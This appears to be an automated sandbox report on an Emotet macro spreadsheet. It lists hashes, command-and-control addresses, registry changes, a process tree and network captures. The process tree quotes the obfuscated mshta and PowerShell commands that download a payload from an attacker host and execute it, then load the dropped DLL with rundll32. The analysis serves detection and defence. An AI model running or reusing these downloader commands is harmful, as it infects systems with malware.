Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
20-01-2022 13:00
Behavioral task
behavioral1
Sample
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
Resource
win10v2004-en-20220113
General
-
Target
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
-
Size
115KB
-
MD5
12f7a6aa0a09e355bd70c8291ae682e2
-
SHA1
ea7943806f839e871bb5c957d64850ca66118577
-
SHA256
92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a
-
SHA512
df6ee800f9bf4b2e9a60b8a371031410416992b4b1806900fdfc4d399e5c5cdf5efc53d62ce3f8549bdbe3e88e20f4c4cf6662d8b826d4c0cb082a53d0afb2a4
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Extracted
http://92.255.57.195/sec/se1.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 640 1108 cmd.exe 26 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 8 IoCs
flow pid Process 4 836 mshta.exe 5 1744 powershell.exe 7 1744 powershell.exe 9 1744 powershell.exe 11 1952 rundll32.exe 12 1952 rundll32.exe 13 1952 rundll32.exe 15 1952 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 8 IoCs
pid Process 1740 rundll32.exe 1740 rundll32.exe 1740 rundll32.exe 1740 rundll32.exe 1168 rundll32.exe 1168 rundll32.exe 1168 rundll32.exe 1168 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Wagne\xhjatsq.oce rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1108 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1744 powershell.exe 1952 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1744 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 1108 wrote to memory of 1492 1108 EXCEL.EXE 27 PID 1108 wrote to memory of 1492 1108 EXCEL.EXE 27 PID 1108 wrote to memory of 1492 1108 EXCEL.EXE 27 PID 1108 wrote to memory of 1492 1108 EXCEL.EXE 27 PID 1108 wrote to memory of 640 1108 EXCEL.EXE 28 PID 1108 wrote to memory of 640 1108 EXCEL.EXE 28 PID 1108 wrote to memory of 640 1108 EXCEL.EXE 28 PID 1108 wrote to memory of 640 1108 EXCEL.EXE 28 PID 640 wrote to memory of 836 640 cmd.exe 30 PID 640 wrote to memory of 836 640 cmd.exe 30 PID 640 wrote to memory of 836 640 cmd.exe 30 PID 640 wrote to memory of 836 640 cmd.exe 30 PID 836 wrote to memory of 1744 836 mshta.exe 34 PID 836 wrote to memory of 1744 836 mshta.exe 34 PID 836 wrote to memory of 1744 836 mshta.exe 34 PID 836 wrote to memory of 1744 836 mshta.exe 34 PID 1744 wrote to memory of 1544 1744 powershell.exe 36 PID 1744 wrote to memory of 1544 1744 powershell.exe 36 PID 1744 wrote to memory of 1544 1744 powershell.exe 36 PID 1744 wrote to memory of 1544 1744 powershell.exe 36 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1544 wrote to memory of 1740 1544 cmd.exe 37 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1740 wrote to memory of 1168 1740 rundll32.exe 38 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1168 wrote to memory of 1696 1168 rundll32.exe 39 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40 PID 1696 wrote to memory of 1952 1696 rundll32.exe 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",jkYS8⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
-
-
-
-
-
-
Network
-
Remote address:92.255.57.195:80RequestGET /sec/se1.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
ETag: "2adf-5d5f38fbf4740"
Accept-Ranges: bytes
Content-Length: 10975
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-
Remote address:92.255.57.195:80RequestGET /sec/se1.png HTTP/1.1
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
ETag: "430-5d5f3895e9680"
Accept-Ranges: bytes
Content-Length: 1072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
Remote address:8.8.8.8:53Requestseven-lines.comIN AResponseseven-lines.comIN A178.208.83.22
-
Remote address:8.8.8.8:53Requestseven-lines.comIN AResponseseven-lines.comIN A178.208.83.22
-
Remote address:178.208.83.22:80RequestGET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
Host: seven-lines.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2022 13:00:41 GMT
Content-Type: text/html
Content-Length: 1390
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
ETag: "5a4b7cd2-56e"
-
Remote address:8.8.8.8:53Requestquranthemepark.comIN AResponsequranthemepark.comIN A104.21.59.15quranthemepark.comIN A172.67.167.147
-
Remote address:104.21.59.15:80RequestGET /wp-content/OaIz2gBtm/ HTTP/1.1
Host: quranthemepark.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 573440
Connection: keep-alive
x-powered-by: PHP/7.4.26
set-cookie: 61e95cfa6871d=1642683642; expires=Thu, 20-Jan-2022 13:01:42 GMT; Max-Age=60; path=/
cache-control: no-cache, must-revalidate
pragma: no-cache
last-modified: Thu, 20 Jan 2022 13:00:42 GMT
expires: Thu, 20 Jan 2022 13:00:42 GMT
content-disposition: attachment; filename="Mnn5aTw4cbQfa.dll"
content-transfer-encoding: binary
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f9paFLKTegeP5IDk2NxxNSU15mFgeI%2BSkYNERxLmZWMhC3sklK8E8%2FrgJ5hTqbw0MCTSvhDVR11FTDqfwtHaK3FUQyrwQok6i0ErQn1BpvRmqZyUoBrCCpnAsBCX6EweaEiHOCU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6d087cbcfe261ed6-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:69.16.218.101:8080RequestGET /LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN HTTP/1.1
Cookie: YiLPOtLipOUi=69ndAlY7nJX7O7X28fOPnpLakAWbOBrRvH9Fxu1XphOKCEJhfpCFBMAjStZIqQEYEV1DNK+VsVSFwB9+PPMrGgd0jpNpAVDnW9+ntx0R9iZARURcfcsgdNPVA9eH1vILlrOUSKzlQt9ziLvdxNN7E+4Q/wyb5/F7f4K9GPRCD5koPhSIzxpYL7srrUqaMNgNiTWesm8XdLaMZ1J/LzDz+gK9BQzPow7y0ZaOADzQEfecUvz+DTLUdxgLUtaz3kXtMWK8Tk1UqCg/w4GVgnL7j1oD1JGZNP/7jKNOP2NmKNxxNzI=
Host: 69.16.218.101:8080
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 20 Jan 2022 13:00:59 GMT
